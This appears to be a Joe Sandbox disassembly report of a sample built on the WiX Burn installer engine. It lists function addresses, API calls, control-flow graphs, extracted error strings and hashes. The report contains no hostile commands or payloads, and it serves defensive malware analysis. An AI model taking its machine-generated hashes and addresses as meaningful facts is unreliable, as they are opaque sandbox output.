                                                            • Opcode ID: 84de0117d38682e4fce43554dd2dbe621327b48a4082e457bbee36474afbbfde
                                                            • Instruction ID: eff7ea0100f31a87c81ff195369bea1c7b8467e7b675414b22fb4e859de107c8
                                                            • Opcode Fuzzy Hash: 84de0117d38682e4fce43554dd2dbe621327b48a4082e457bbee36474afbbfde
                                                            • Instruction Fuzzy Hash: 5E01FC32901529FB9B227B59DC0AC9EBB79FF54720B104266F801F6350EB35DE10E792
                                                            Function 008A48D8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(00000000,?,008A48AE,00000000,008D7F08,0000000C,008A4A05,00000000,00000002,00000000), ref: 008A48F9
                                                            • TerminateProcess.KERNEL32(00000000,?,008A48AE,00000000,008D7F08,0000000C,008A4A05,00000000,00000002,00000000), ref: 008A4900
                                                            • ExitProcess.KERNEL32 ref: 008A4912
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Process$CurrentExitTerminate
                                                            • String ID:
                                                            • API String ID: 1703294689-0
                                                            • Opcode ID: 0508333362a70382f6fbfe88d22991dd0c2975605fa40038972ca35e95f68960
                                                            • Instruction ID: 29d1459e950e8c54399f5e6c0ed8ded395a587db6980037a14529ecf35eb5293
                                                            • Opcode Fuzzy Hash: 0508333362a70382f6fbfe88d22991dd0c2975605fa40038972ca35e95f68960
                                                            • Instruction Fuzzy Hash: A0E0B631400248ABDF11AF58DD09A9A3F69FF86791B049124F8598A632CBB9DD62CA91
                                                            Function 0087394F Relevance: 3.0, APIs: 2, Instructions: 13memoryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(?,000001C7,?,00872274,000001C7,00000001,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873960
                                                            • RtlAllocateHeap.NTDLL(00000000,?,00872274,000001C7,00000001,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873967
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Heap$AllocateProcess
                                                            • String ID:
                                                            • API String ID: 1357844191-0
                                                            • Opcode ID: ccd7a9500b379d8dadb2bf963887cb3e7ee4ca401640d6c4d654741798eeb969
                                                            • Instruction ID: 6f6675610a670839bceaae894d44677a50c86dab35ee8bdf04fbc608408a7541
                                                            • Opcode Fuzzy Hash: ccd7a9500b379d8dadb2bf963887cb3e7ee4ca401640d6c4d654741798eeb969
                                                            • Instruction Fuzzy Hash: 58C012321A420CAB8B006FF8EC0EC9A3BACBB286027048610B906C3120C778E0108B60
                                                            Function 0087DF33 Relevance: 126.6, APIs: 11, Strings: 61, Instructions: 646COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SysFreeString.OLEAUT32(00000000), ref: 0087E058
                                                            • SysFreeString.OLEAUT32(00000000), ref: 0087E736
                                                              • Part of subcall function 0087394F: GetProcessHeap.KERNEL32(?,000001C7,?,00872274,000001C7,00000001,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873960
                                                              • Part of subcall function 0087394F: RtlAllocateHeap.NTDLL(00000000,?,00872274,000001C7,00000001,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873967
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: FreeHeapString$AllocateProcess
                                                            • String ID: Cache$CacheId$Chain/ExePackage|Chain/MsiPackage|Chain/MspPackage|Chain/MsuPackage$ExePackage$Failed to allocate memory for MSP patch sequence information.$Failed to allocate memory for package structs.$Failed to allocate memory for patch sequence information to package lookup.$Failed to allocate memory for rollback boundary structs.$Failed to find backward transaction boundary: %ls$Failed to find forward transaction boundary: %ls$Failed to get @Cache.$Failed to get @CacheId.$Failed to get @Id.$Failed to get @InstallCondition.$Failed to get @InstallSize.$Failed to get @LogPathVariable.$Failed to get @PerMachine.$Failed to get @Permanent.$Failed to get @RollbackBoundaryBackward.$Failed to get @RollbackBoundaryForward.$Failed to get @RollbackLogPathVariable.$Failed to get @Size.$Failed to get @Vital.$Failed to get next node.$Failed to get package node count.$Failed to get rollback bundary node count.$Failed to parse EXE package.$Failed to parse MSI package.$Failed to parse MSP package.$Failed to parse MSU package.$Failed to parse dependency providers.$Failed to parse payload references.$Failed to parse target product codes.$Failed to select package nodes.$Failed to select rollback boundary nodes.$InstallCondition$InstallSize$Invalid cache type: %ls$LogPathVariable$MsiPackage$MspPackage$MsuPackage$PerMachine$Permanent$RollbackBoundary$RollbackBoundaryBackward$RollbackBoundaryForward$RollbackLogPathVariable$Size$Vital$`<u$always$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$feclient.dll$msi.dll$package.cpp$wininet.dll$yes
                                                            • API String ID: 336948655-2953049543
                                                            • Opcode ID: 5dcae76dd318d9267324fc625fc270cf4f47a5fed76e35e51cac652877df4a1a
                                                            • Instruction ID: 6cae8d050175ac77aed66507fc27f629245c5a00f84e41b981efefc8fa849351
                                                            • Opcode Fuzzy Hash: 5dcae76dd318d9267324fc625fc270cf4f47a5fed76e35e51cac652877df4a1a
                                                            • Instruction Fuzzy Hash: D232A431D4021AEBCB219B64CC41FAEB6B4FB18764F1482A9E928FB295D774DD00DB91
                                                            Function 0087F9E3 Relevance: 112.4, APIs: 3, Strings: 61, Instructions: 446COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 222 87f9e3-87fa14 call 8b39af 225 87fa16 222->225 226 87fa18-87fa1a 222->226 225->226 227 87fa2e-87fa47 call 8b32f3 226->227 228 87fa1c-87fa29 call 8b0237 226->228 234 87fa53-87fa68 call 8b32f3 227->234 235 87fa49-87fa4e 227->235 233 87ff16-87ff1b 228->233 236 87ff23-87ff28 233->236 237 87ff1d-87ff1f 233->237 247 87fa74-87fa81 call 87ea42 234->247 248 87fa6a-87fa6f 234->248 238 87ff0d-87ff14 call 8b0237 235->238 241 87ff30-87ff35 236->241 242 87ff2a-87ff2c 236->242 237->236 250 87ff15 238->250 245 87ff37-87ff39 241->245 246 87ff3d-87ff41 241->246 242->241 245->246 251 87ff43-87ff46 call 8b5636 246->251 252 87ff4b-87ff52 246->252 255 87fa83-87fa88 247->255 256 87fa8d-87faa2 call 8b32f3 247->256 248->238 250->233 251->252 255->238 259 87faa4-87faa9 256->259 260 87faae-87fac0 call 8b4c97 256->260 259->238 263 87fac2-87faca 260->263 264 87facf-87fae4 call 8b32f3 260->264 265 87fd99-87fda2 call 8b0237 263->265 270 87fae6-87faeb 264->270 271 87faf0-87fb05 call 8b32f3 264->271 265->250 270->238 274 87fb07-87fb0c 271->274 275 87fb11-87fb23 call 8b3505 271->275 274->238 278 87fb25-87fb2a 275->278 279 87fb2f-87fb45 call 8b39af 275->279 278->238 282 87fdf4-87fe0e call 87ecbe 279->282 283 87fb4b-87fb4d 279->283 289 87fe10-87fe15 282->289 290 87fe1a-87fe32 call 8b39af 282->290 284 87fb4f-87fb54 283->284 285 87fb59-87fb6e call 8b3505 283->285 284->238 292 87fb70-87fb75 285->292 293 87fb7a-87fb8f call 8b32f3 285->293 289->238 298 87fefc-87fefd call 87f0f8 290->298 299 87fe38-87fe3a 290->299 292->238 300 87fb91-87fb93 293->300 301 87fb9f-87fbb4 call 8b32f3 293->301 308 87ff02-87ff06 298->308 302 87fe46-87fe64 call 8b32f3 299->302 303 87fe3c-87fe41 299->303 300->301 305 87fb95-87fb9a 300->305 312 87fbb6-87fbb8 301->312 313 87fbc4-87fbd9 call 8b32f3 301->313 314 87fe66-87fe6b 302->314 315 87fe70-87fe88 call 8b32f3 302->315 303->238 305->238 308->250 311 87ff08 308->311 311->238 312->313 316 87fbba-87fbbf 312->316 323 87fbdb-87fbdd 313->323 324 87fbe9-87fbfe call 8b32f3 313->324 314->238 321 87fe95-87fead call 8b32f3 315->321 322 87fe8a-87fe8c 315->322 316->238 331 87feaf-87feb1 321->331 332 87feba-87fed2 call 8b32f3 321->332 322->321 327 87fe8e-87fe93 322->327 323->324 328 87fbdf-87fbe4 323->328 333 87fc00-87fc02 324->333 334 87fc0e-87fc23 call 8b32f3 324->334 327->238 328->238 331->332 335 87feb3-87feb8 331->335 341 87fed4-87fed9 332->341 342 87fedb-87fef3 call 8b32f3 332->342 333->334 336 87fc04-87fc09 333->336 343 87fc25-87fc27 334->343 344 87fc33-87fc48 call 8b32f3 334->344 335->238 336->238 341->238 342->298 350 87fef5-87fefa 342->350 343->344 346 87fc29-87fc2e 343->346 351 87fc4a-87fc4c 344->351 352 87fc58-87fc6d call 8b32f3 344->352 346->238 350->238 351->352 354 87fc4e-87fc53 351->354 356 87fc6f-87fc71 352->356 357 87fc7d-87fc92 call 8b32f3 352->357 354->238 356->357 358 87fc73-87fc78 356->358 361 87fc94-87fc96 357->361 362 87fca2-87fcba call 8b32f3 357->362 358->238 361->362 363 87fc98-87fc9d 361->363 366 87fcbc-87fcbe 362->366 367 87fcca-87fce2 call 8b32f3 362->367 363->238 366->367 368 87fcc0-87fcc5 366->368 371 87fce4-87fce6 367->371 372 87fcf2-87fd07 call 8b32f3 367->372 368->238 371->372 373 87fce8-87fced 371->373 376 87fda7-87fda9 372->376 377 87fd0d-87fd2a CompareStringW 372->377 373->238 378 87fdb4-87fdb6 376->378 379 87fdab-87fdb2 376->379 380 87fd34-87fd49 CompareStringW 377->380 381 87fd2c-87fd32 377->381 382 87fdc2-87fdda call 8b3505 378->382 383 87fdb8-87fdbd 378->383 379->378 385 87fd57-87fd6c CompareStringW 380->385 386 87fd4b-87fd55 380->386 384 87fd75-87fd7a 381->384 382->282 392 87fddc-87fdde 382->392 383->238 384->378 388 87fd6e 385->388 389 87fd7c-87fd94 call 873821 385->389 386->384 388->384 389->265 394 87fde0-87fde5 392->394 395 87fdea 392->395 394->238 395->282
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: StringVariant$AllocClearFreeInit
                                                            • String ID: AboutUrl$Arp$Classification$Comments$Contact$Department$DisableModify$DisableRemove$DisplayName$DisplayVersion$ExecutableName$Failed to get @AboutUrl.$Failed to get @Classification.$Failed to get @Comments.$Failed to get @Contact.$Failed to get @Department.$Failed to get @DisableModify.$Failed to get @DisableRemove.$Failed to get @DisplayName.$Failed to get @DisplayVersion.$Failed to get @ExecutableName.$Failed to get @HelpLink.$Failed to get @HelpTelephone.$Failed to get @Id.$Failed to get @Manufacturer.$Failed to get @Name.$Failed to get @ParentDisplayName.$Failed to get @PerMachine.$Failed to get @ProductFamily.$Failed to get @ProviderKey.$Failed to get @Publisher.$Failed to get @Register.$Failed to get @Tag.$Failed to get @UpdateUrl.$Failed to get @Version.$Failed to parse @Version: %ls$Failed to parse related bundles$Failed to parse software tag.$Failed to select ARP node.$Failed to select Update node.$Failed to select registration node.$Failed to set registration paths.$HelpLink$HelpTelephone$Invalid modify disabled type: %ls$Manufacturer$Name$ParentDisplayName$PerMachine$ProductFamily$ProviderKey$Publisher$Register$Registration$Tag$Update$UpdateUrl$Version$button$registration.cpp$yes
                                                            • API String ID: 760788290-2956246334
                                                            • Opcode ID: 13f96c77c210af29925a1f709432fc55cec9d2b79dd9a46c34c20a940cd020b5
                                                            • Instruction ID: f1503f23af40e07fbef432d11911aab5dc66b1a63adbaab3f0c9ec49722e17ec
                                                            • Opcode Fuzzy Hash: 13f96c77c210af29925a1f709432fc55cec9d2b79dd9a46c34c20a940cd020b5
                                                            • Instruction Fuzzy Hash: C5E1E632E4466ABACB229665CC46FADB664FF01714F108236FA29F635BCF74DD0096C1
                                                            Function 0087B48B Relevance: 91.6, APIs: 24, Strings: 28, Instructions: 578fileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 396 87b48b-87b500 call 89f8e0 * 2 401 87b502-87b50c GetLastError 396->401 402 87b538-87b53e 396->402 403 87b50e-87b517 401->403 404 87b519 401->404 405 87b542-87b554 SetFilePointerEx 402->405 406 87b540 402->406 403->404 407 87b520-87b52d call 873821 404->407 408 87b51b 404->408 409 87b556-87b560 GetLastError 405->409 410 87b588-87b5a2 ReadFile 405->410 406->405 426 87b532-87b533 407->426 408->407 414 87b562-87b56b 409->414 415 87b56d 409->415 411 87b5a4-87b5ae GetLastError 410->411 412 87b5d9-87b5e0 410->412 418 87b5b0-87b5b9 411->418 419 87b5bb 411->419 421 87bbd7-87bbeb call 873821 412->421 422 87b5e6-87b5ef 412->422 414->415 416 87b574-87b586 call 873821 415->416 417 87b56f 415->417 416->426 417->416 418->419 424 87b5c2-87b5d4 call 873821 419->424 425 87b5bd 419->425 441 87bbf0 421->441 422->421 428 87b5f5-87b605 SetFilePointerEx 422->428 424->426 425->424 433 87bbf1-87bbf7 call 8b0237 426->433 429 87b607-87b611 GetLastError 428->429 430 87b63c-87b654 ReadFile 428->430 436 87b613-87b61c 429->436 437 87b61e 429->437 438 87b656-87b660 GetLastError 430->438 439 87b68b-87b692 430->439 449 87bbf8-87bc0a call 89e06f 433->449 436->437 445 87b625-87b632 call 873821 437->445 446 87b620 437->446 447 87b662-87b66b 438->447 448 87b66d 438->448 443 87bbbc-87bbd5 call 873821 439->443 444 87b698-87b6a2 439->444 441->433 443->441 444->443 450 87b6a8-87b6cb SetFilePointerEx 444->450 445->430 446->445 447->448 453 87b674-87b681 call 873821 448->453 454 87b66f 448->454 456 87b702-87b71a ReadFile 450->456 457 87b6cd-87b6d7 GetLastError 450->457 453->439 454->453 464 87b751-87b769 ReadFile 456->464 465 87b71c-87b726 GetLastError 456->465 462 87b6e4 457->462 463 87b6d9-87b6e2 457->463 469 87b6e6 462->469 470 87b6eb-87b6f8 call 873821 462->470 463->462 467 87b7a0-87b7bb SetFilePointerEx 464->467 468 87b76b-87b775 GetLastError 464->468 471 87b733 465->471 472 87b728-87b731 465->472 478 87b7f5-87b814 ReadFile 467->478 479 87b7bd-87b7c7 GetLastError 467->479 475 87b777-87b780 468->475 476 87b782 468->476 469->470 470->456 473 87b735 471->473 474 87b73a-87b747 call 873821 471->474 472->471 473->474 474->464 475->476 485 87b784 476->485 486 87b789-87b796 call 873821 476->486 483 87bb7d-87bb87 GetLastError 478->483 484 87b81a-87b81c 478->484 480 87b7d4 479->480 481 87b7c9-87b7d2 479->481 488 87b7d6 480->488 489 87b7db-87b7eb call 873821 480->489 481->480 493 87bb94 483->493 494 87bb89-87bb92 483->494 491 87b81d-87b824 484->491 485->486 486->467 488->489 489->478 498 87b82a-87b836 491->498 499 87bb58-87bb75 call 873821 491->499 495 87bb96 493->495 496 87bb9b-87bbb1 call 873821 493->496 494->493 495->496 514 87bbb2-87bbba call 8b0237 496->514 503 87b841-87b84a 498->503 504 87b838-87b83f 498->504 515 87bb7a-87bb7b 499->515 509 87b850-87b876 ReadFile 503->509 510 87bb1b-87bb32 call 873821 503->510 504->503 507 87b884-87b88b 504->507 511 87b8b4-87b8cb call 87394f 507->511 512 87b88d-87b8af call 873821 507->512 509->483 516 87b87c-87b882 509->516 522 87bb37-87bb3d call 8b0237 510->522 526 87b8ef-87b904 SetFilePointerEx 511->526 527 87b8cd-87b8ea call 873821 511->527 512->515 514->449 515->514 516->491 532 87bb43-87bb44 522->532 530 87b906-87b910 GetLastError 526->530 531 87b944-87b969 ReadFile 526->531 527->433 536 87b912-87b91b 530->536 537 87b91d 530->537 533 87b9a0-87b9ac 531->533 534 87b96b-87b975 GetLastError 531->534 538 87bb45-87bb47 532->538 541 87b9cf-87b9d3 533->541 542 87b9ae-87b9ca call 873821 533->542 539 87b977-87b980 534->539 540 87b982 534->540 536->537 543 87b924-87b934 call 873821 537->543 544 87b91f 537->544 538->449 547 87bb4d-87bb53 call 873a16 538->547 539->540 548 87b984 540->548 549 87b989-87b99e call 873821 540->549 545 87b9d5-87ba09 call 873821 call 8b0237 541->545 546 87ba0e-87ba21 call 8b4a05 541->546 542->522 558 87b939-87b93f call 8b0237 543->558 544->543 545->538 565 87ba23-87ba28 546->565 566 87ba2d-87ba37 546->566 547->449 548->549 549->558 558->532 565->558 569 87ba41-87ba49 566->569 570 87ba39-87ba3f 566->570 572 87ba55-87ba58 569->572 573 87ba4b-87ba53 569->573 571 87ba5a-87baba call 87394f 570->571 576 87bade-87baff call 89f360 call 87b208 571->576 577 87babc-87bad8 call 873821 571->577 572->571 573->571 576->538 584 87bb01-87bb11 call 873821 576->584 577->576 584->510
                                                            APIs
                                                            • GetLastError.KERNEL32(?,?,?,00000000,76EEC3F0,00000000), ref: 0087B502
                                                            • SetFilePointerEx.KERNELBASE(000000FF,00000000,00000000,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0087B550
                                                            • GetLastError.KERNEL32(?,?,?,00000000,76EEC3F0,00000000), ref: 0087B556
                                                            • ReadFile.KERNELBASE(00000000,00874461,00000040,?,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0087B59E
                                                            • GetLastError.KERNEL32(?,?,?,00000000,76EEC3F0,00000000), ref: 0087B5A4
                                                            • SetFilePointerEx.KERNELBASE(00000000,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0087B601
                                                            • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0087B607
                                                            • ReadFile.KERNELBASE(00000000,?,00000018,00000040,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0087B650
                                                            • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0087B656
                                                            • SetFilePointerEx.KERNELBASE(00000000,-00000098,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0087B6C7
                                                            • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0087B6CD
                                                            • ReadFile.KERNEL32(00000000,?,00000004,00000018,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0087B716
                                                            • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0087B71C
                                                            • ReadFile.KERNEL32(00000000,?,00000004,00000018,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0087B765
                                                            • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0087B76B
                                                            • SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0087B7B7
                                                            • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0087B7BD
                                                              • Part of subcall function 0087394F: GetProcessHeap.KERNEL32(?,000001C7,?,00872274,000001C7,00000001,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873960
                                                              • Part of subcall function 0087394F: RtlAllocateHeap.NTDLL(00000000,?,00872274,000001C7,00000001,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873967
                                                            • ReadFile.KERNEL32(00000000,?,00000028,00000018,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0087B810
                                                            • ReadFile.KERNEL32(00000000,?,00000028,00000028,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0087B872
                                                            • SetFilePointerEx.KERNELBASE(00000000,?,00000000,00000000,00000000,00000034,00000001,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0087B8FC
                                                            • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0087B906
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: File$ErrorLast$Read$Pointer$Heap$AllocateProcess
                                                            • String ID: ($.wix$4$Failed to allocate buffer for section info.$Failed to allocate memory for container sizes.$Failed to find Burn section.$Failed to find valid DOS image header in buffer.$Failed to find valid NT image header in buffer.$Failed to get total size of bundle.$Failed to open handle to engine process path.$Failed to read DOS header.$Failed to read NT header.$Failed to read complete image section header, index: %u$Failed to read complete section info.$Failed to read image section header, index: %u$Failed to read section info, data to short: %u$Failed to read section info, unsupported version: %08x$Failed to read section info.$Failed to read signature offset.$Failed to read signature size.$Failed to seek past optional headers.$Failed to seek to NT header.$Failed to seek to section info.$Failed to seek to start of file.$PE$PE Header from file didn't match PE Header in memory.$burn$section.cpp
                                                            • API String ID: 3411815225-695169583
                                                            • Opcode ID: 0882074c665805cce5f44d39bcc7ccf7a32031dc4517d4c4e71f2950b04d429f
                                                            • Instruction ID: 3063238d8ea8269993203c296bba4681c3527b245dae8e0d8fcd5b84a6de0852
                                                            • Opcode Fuzzy Hash: 0882074c665805cce5f44d39bcc7ccf7a32031dc4517d4c4e71f2950b04d429f
                                                            • Instruction Fuzzy Hash: 0012B372940635ABDB209A548C46FEA7A65FB04720F1181A5FE1CFB385E774DD408BD2
                                                            Function 00890D16 Relevance: 54.6, APIs: 20, Strings: 11, Instructions: 306synchronizationCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 587 890d16-890d2d SetEvent 588 890d6f-890d7d WaitForSingleObject 587->588 589 890d2f-890d39 GetLastError 587->589 590 890d7f-890d89 GetLastError 588->590 591 890db4-890dbf ResetEvent 588->591 592 890d3b-890d44 589->592 593 890d46 589->593 594 890d8b-890d94 590->594 595 890d96 590->595 596 890df9-890dff 591->596 597 890dc1-890dcb GetLastError 591->597 592->593 598 890d48 593->598 599 890d4d-890d5d call 873821 593->599 594->595 602 890d98 595->602 603 890d9d-890db2 call 873821 595->603 600 890e01-890e04 596->600 601 890e32-890e4b call 8721ac 596->601 604 890dd8 597->604 605 890dcd-890dd6 597->605 598->599 618 890d62-890d6a call 8b0237 599->618 607 890e28-890e2d 600->607 608 890e06-890e23 call 873821 600->608 621 890e4d-890e5e call 8b0237 601->621 622 890e63-890e6e SetEvent 601->622 602->603 603->618 611 890dda 604->611 612 890ddf-890df4 call 873821 604->612 605->604 615 8910e8-8910ed 607->615 627 8910de-8910e4 call 8b0237 608->627 611->612 612->618 623 8910ef 615->623 624 8910f2-8910f8 615->624 618->615 641 8910e5-8910e7 621->641 629 890ea8-890eb6 WaitForSingleObject 622->629 630 890e70-890e7a GetLastError 622->630 623->624 627->641 632 890eb8-890ec2 GetLastError 629->632 633 890ef0-890efb ResetEvent 629->633 636 890e7c-890e85 630->636 637 890e87 630->637 638 890ecf 632->638 639 890ec4-890ecd 632->639 642 890efd-890f07 GetLastError 633->642 643 890f35-890f3c 633->643 636->637 644 890e89 637->644 645 890e8e-890ea3 call 873821 637->645 649 890ed1 638->649 650 890ed6-890eeb call 873821 638->650 639->638 641->615 651 890f09-890f12 642->651 652 890f14 642->652 647 890fab-890fce CreateFileW 643->647 648 890f3e-890f41 643->648 644->645 662 8910dd 645->662 654 89100b-89101f SetFilePointerEx 647->654 655 890fd0-890fda GetLastError 647->655 656 890f6e-890f72 call 87394f 648->656 657 890f43-890f46 648->657 649->650 650->662 651->652 659 890f1b-890f30 call 873821 652->659 660 890f16 652->660 668 891059-891064 SetEndOfFile 654->668 669 891021-89102b GetLastError 654->669 663 890fdc-890fe5 655->663 664 890fe7 655->664 680 890f77-890f7c 656->680 665 890f48-890f4b 657->665 666 890f67-890f69 657->666 659->662 660->659 662->627 663->664 674 890fe9 664->674 675 890fee-891001 call 873821 664->675 676 890f5d-890f62 665->676 677 890f4d-890f53 665->677 666->615 672 89109b-8910a8 SetFilePointerEx 668->672 673 891066-891070 GetLastError 668->673 678 891038 669->678 679 89102d-891036 669->679 672->641 684 8910aa-8910b4 GetLastError 672->684 681 89107d 673->681 682 891072-89107b 673->682 674->675 675->654 676->641 677->676 687 89103a 678->687 688 89103f-891054 call 873821 678->688 679->678 685 890f9d-890fa6 680->685 686 890f7e-890f98 call 873821 680->686 690 89107f 681->690 691 891084-891099 call 873821 681->691 682->681 693 8910c1 684->693 694 8910b6-8910bf 684->694 685->641 686->662 687->688 688->662 690->691 691->662 699 8910c8-8910d8 call 873821 693->699 700 8910c3 693->700 694->693 699->662 700->699
                                                            APIs
                                                            • SetEvent.KERNEL32(?,?,?,?,?,008908BC,?,?), ref: 00890D25
                                                            • GetLastError.KERNEL32(?,?,?,?,008908BC,?,?), ref: 00890D2F
                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,008908BC,?,?), ref: 00890D74
                                                            • GetLastError.KERNEL32(?,?,?,?,008908BC,?,?), ref: 00890D7F
                                                            • ResetEvent.KERNEL32(?,?,?,?,?,008908BC,?,?), ref: 00890DB7
                                                            • GetLastError.KERNEL32(?,?,?,?,008908BC,?,?), ref: 00890DC1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$Event$ObjectResetSingleWait
                                                            • String ID: Failed to allocate buffer for stream.$Failed to copy stream name: %ls$Failed to create file: %ls$Failed to reset begin operation event.$Failed to set end of file.$Failed to set file pointer to beginning of file.$Failed to set file pointer to end of file.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$cabextract.cpp
                                                            • API String ID: 1865021742-2104912459
                                                            • Opcode ID: 93f750e0101d6c85013b773761c47c1629070fbd433b52ffba292175f35606de
                                                            • Instruction ID: 39bf482948d24abb46546cbc2e7ca09586a7e02f622594fb7f8a8624d68fe870
